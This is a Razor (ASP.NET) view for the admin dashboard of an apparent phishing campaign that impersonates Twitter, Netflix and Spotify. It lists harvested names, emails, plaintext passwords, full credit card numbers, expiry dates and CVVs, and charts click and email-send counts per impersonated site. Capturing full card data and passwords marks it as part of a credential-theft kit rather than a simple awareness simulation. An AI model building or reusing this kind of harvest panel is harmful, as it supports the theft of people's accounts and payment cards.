@{
    ViewData["Title"] = "Home Page";
    var phisingInfo = ViewData["PhisingInfos"] as List<PhishingUserInfoViewModel>;
}

<div class="container-fluid px-4">
    <h1 class="mt-4">Dashboard</h1>
    <div class="card mb-4">
        <div class="card-header">
            <i class="fas fa-table me-1"></i>
            Phishing Report
        </div>
        <div class="card-body">
            <table id="report">
                <thead>
                    <tr>
                        <th>Name</th>
                        <th>Email Address</th>
                        <th>Password</th>
                        <th>CC Number</th>
                        <th>CC Expiry</th>
                        <th>CC CVV</th>
                        <th>Source</th>
                    </tr>
                </thead>
                <tfoot>
                    <tr>
                        <th>Name</th>
                        <th>Email Address</th>
                        <th>Password</th>
                        <th>CC Number</th>
                        <th>CC Expiry</th>
                        <th>CC CVV</th>
                        <th>Source</th>
                    </tr>
                </tfoot>
                <tbody>
                    @foreach (var user in phisingInfo)
                    {
                        <tr>
                            <td>@user.Name</td>
                            <td>@user.Email</td>
                            <td>@user.Password</td>
                            <td>@user.CreditCardNumber</td>
                            <td>@user.CreditCardExpirationDate</td>
                            <td>@user.CreditCardCVV</td>
                            <td>@user.Source</td>
                        </tr>
                    }
                </tbody>
            </table>
        </div>
    </div>
    <div class="row">
        <div class="col-lg-6">
            <div class="card mb-4">
                <div class="card-header">
                    <i class="fas fa-chart-pie me-1"></i>
                    Click Counts (Total: @ViewData["TotalCount"])
                </div>
                <div class="card-body"><canvas id="isClickedChart" width="100%" height="50"></canvas></div>
            </div>
        </div>
        <div class="col-lg-6">
            <div class="card mb-4">
                <div class="card-header">
                    <i class="fas fa-chart-pie me-1"></i>
                    Clicks Per Site
                </div>
                <div class="card-body"><canvas id="clicksPerSiteChart" width="100%" height="50"></canvas></div>
            </div>
        </div>
    </div>
    <div class="row">
        <div class="col-lg-6">
            <div class="card mb-4">
                <div class="card-header">
                    <i class="fas fa-chart-pie me-1"></i>
                    Sent Emails Per Site
                </div>
                <div class="card-body"><canvas id="sentEmailsPerSiteChart" width="100%" height="50"></canvas></div>
            </div>
        </div>
    </div>
</div>

@section Scripts {
    <script>
        window.addEventListener('DOMContentLoaded', event => {
            // Simple-DataTables
            // https://github.com/fiduswriter/Simple-DataTables/wiki

            const datatablesReport = document.getElementById('report');
            if (datatablesReport) {
                new simpleDatatables.DataTable(datatablesReport);
            }
        });

        Chart.defaults.global.defaultFontFamily = '-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif';
        Chart.defaults.global.defaultFontColor = '#292b2c';

        var ctx = document.getElementById("isClickedChart");
        var isClickedChart = new Chart(ctx, {
            type: 'pie',
            data: {
                labels: ["Clicked", "Not Clicked",],
                datasets: [{
                    data: [@ViewData["ClickedCount"], @ViewData["NotClickedCount"]],
                    backgroundColor: ['#008000', '#FF0000'],
                }],
            },
        });

        var ctx = document.getElementById("clicksPerSiteChart");
        var myPieChart = new Chart(ctx, {
            type: 'pie',
            data: {
                labels: ["Twitter", "Netflix", "Spotify"],
                datasets: [{
                    data: [@ViewData["TwitterClickedCount"], @ViewData["NetflixClickedCount"], @ViewData["SpotifyClickedCount"]],
                    backgroundColor: ['#1DA1F2', '#E50914', '#1ED760'],
                }],
            },
        });

        var ctx = document.getElementById("sentEmailsPerSiteChart");
        var myPieChart = new Chart(ctx, {
            type: 'pie',
            data: {
                labels: ["Twitter", "Netflix", "Spotify"],
                datasets: [{
                    data: [@ViewData["TwitterEmailSentCount"], @ViewData["NetflixEmailSentCount"], @ViewData["SpotifyEmailSentCount"]],
                    backgroundColor: ['#1DA1F2', '#E50914', '#1ED760'],
                }],
            },
        });
    </script>
}